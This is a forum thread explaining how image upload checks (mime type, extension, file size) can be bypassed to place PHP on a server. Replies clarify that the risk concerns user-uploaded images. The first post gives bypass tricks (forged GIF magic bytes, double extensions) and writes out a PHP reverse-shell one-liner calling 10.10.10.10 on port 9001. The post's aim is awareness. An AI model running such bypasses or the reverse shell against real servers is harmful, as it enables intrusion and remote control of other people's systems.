Image Upload Vulnerabilities

[KyleMassacre]

Hello,

I have recently been browsing my unread threads, grave digging here and there, and you know, or their stuff. 
I came across a post by MTG about what he can do if someone decided to host images on their server. I just thought it would be nice to shed some background on this for people who don’t know or never dabbled in some “nefarious” techniques

MTG points out that he (anyone) can just put a little snippet of PHP and execute whatever they want, which is very easy. 
Some things that a lot of people check for on image files are quite easily bypassed like: mime type, extensions, file/image size and I would like to show how some of these are bypassed. 
 

Mime Type/File Extension

With a basic hexeditor, you can easily change the Magic Number once you find out what type(s) of image types are accepted. I would like to argue that allowing “GIFs” is probably the worst file type to allow because people with less than average black or white hat experience can easily just add the GIF constant to a PHP file as the 1st few hex places.

If I were to create a file with the name “image.gif.php” or even “image.gif” (pick your file ext), I just bypassed your file ext and/or mime type. And who knows, it could be a legit image. 
 

Image Size

Image sizes get a little tricky because you want people to be able to upload their image and it could be big or it could be small but I were to find out a max file size by just brute forcing various sized images, content added to my dummy image can be rather big or rather small. Take a look at this example:

//phone doesn’t let me add code tags. Sorry for it being ugly
php -r '$sock=fsockopen("10.10.10.10",9001);exec("sh <&3 >&3 2>&3");'

As you can see, it doesn’t add too much to the file but is very dangerous as this gives me a reverse shell if I have a listener setup to that ip address and port

If you are going to host image files on your box, there are probably halfway decent libs out there that can help with this sort of thing. I only wanted to shed some light on how these things can work.

 

Edited November 17, 2022 by KyleMassacre
Updated misleading title

[Canjucks]

Thank you for this insight. As I am coming to trying to understand this. Does this only apply to hosting images or what about in a website in general does the same rules apply to gaining access to do these unsavoury things? Does this only apply if the directory is visible?

[AdamHull]

It's more to do with letting users upload their own images. Hosting your own images is completely fine to do as they wouldn't be able to inject malicious code into the actual image file

[Canjucks]

41 minutes ago, AdamHull said:

It's more to do with letting users upload their own images. Hosting your own images is completely fine to do as they wouldn't be able to inject malicious code into the actual image file

Thanks

[KyleMassacre]

3 hours ago, Canjucks said:

Thank you for this insight. As I am coming to trying to understand this. Does this only apply to hosting images or what about in a website in general does the same rules apply to gaining access to do these unsavoury things? Does this only apply if the directory is visible?

This is my mistake and my subject was misleading. Adam is correct in the fact that this is geared towards users/players uploading their own images. Let me fix the title